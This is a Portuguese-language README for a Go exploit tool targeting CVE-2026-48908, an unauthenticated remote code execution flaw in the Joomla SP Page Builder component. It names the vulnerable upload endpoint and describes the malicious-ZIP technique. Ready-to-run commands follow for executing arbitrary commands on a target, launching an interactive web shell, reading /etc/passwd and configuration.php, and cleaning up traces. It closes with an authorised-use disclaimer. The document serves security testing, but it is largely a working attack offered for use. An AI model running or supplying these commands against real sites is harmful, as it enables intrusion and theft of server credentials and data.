CVE-2026-48908 - RCE não autenticado no SP Page Builder para Joomla
Exploit de Prova de Conceito para CVE-2026-48908, uma vulnerabilidade de Execução Remota de Código não autenticada no componente SP Page Builder do Joomla.
CVE-2026-48908 é uma vulnerabilidade de segurança crítica que permite que atacantes não autenticados executem código arbitrário em instalações Joomla vulneráveis por meio do tratamento inadequado da extração de arquivos ZIP no componente SP Page Builder.
index.php?option=com_sppagebuilder&task=asset.uploadCustomIconA vulnerabilidade existe na funcionalidade de upload de assets, onde a aplicação valida e extrai de forma inadequada arquivos ZIP contendo assets de ícones. Um atacante pode criar um arquivo ZIP malicioso com payloads PHP que serão extraídos para o diretório acessível pela web, permitindo a execução remota de código.
golang.org/x/term - Utilitários de terminal para entrada segura de senhagit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
Binários compilados estão disponíveis na seção de releases.


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
Target URL of vulnerable Joomla installation (required)
Example: http://target.com or https://target.com
-cmd string
System command to execute on target
Example: "cat /etc/passwd"
-shell
Launch interactive shell on target (requires successful exploitation)
-check
Check if target is vulnerable without attempting exploitation
-cleanup
Remove uploaded shell and artifacts from target
-token string
CSRF token for exploitation (optional, auto-detected if not provided)
A ferramenta suporta múltiplos vetores de exploração:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
Se você está executando Joomla com o componente SP Page Builder:
Este software é fornecido apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Os autores não aceitam responsabilidade por uso indevido ou danos causados por esta ferramenta. Os usuários são responsáveis por garantir que possuem autorização adequada antes de usar esta ferramenta em qualquer sistema alvo.
Ao usar esta ferramenta, você reconhece que:
Esta ferramenta destina-se apenas a pesquisa de segurança defensiva e testes de penetração autorizados. O acesso não autorizado a sistemas de computador viola o Computer Fraud and Abuse Act e leis similares em outras jurisdições. Sempre obtenha autorização adequada por escrito antes de realizar testes de segurança.
index.php?option=com_installer&view=manageContribuições de pesquisa de segurança são bem-vindas. Por favor:
GhostGTR666 (Gagaltotal666)
Para problemas, dúvidas ou contribuições: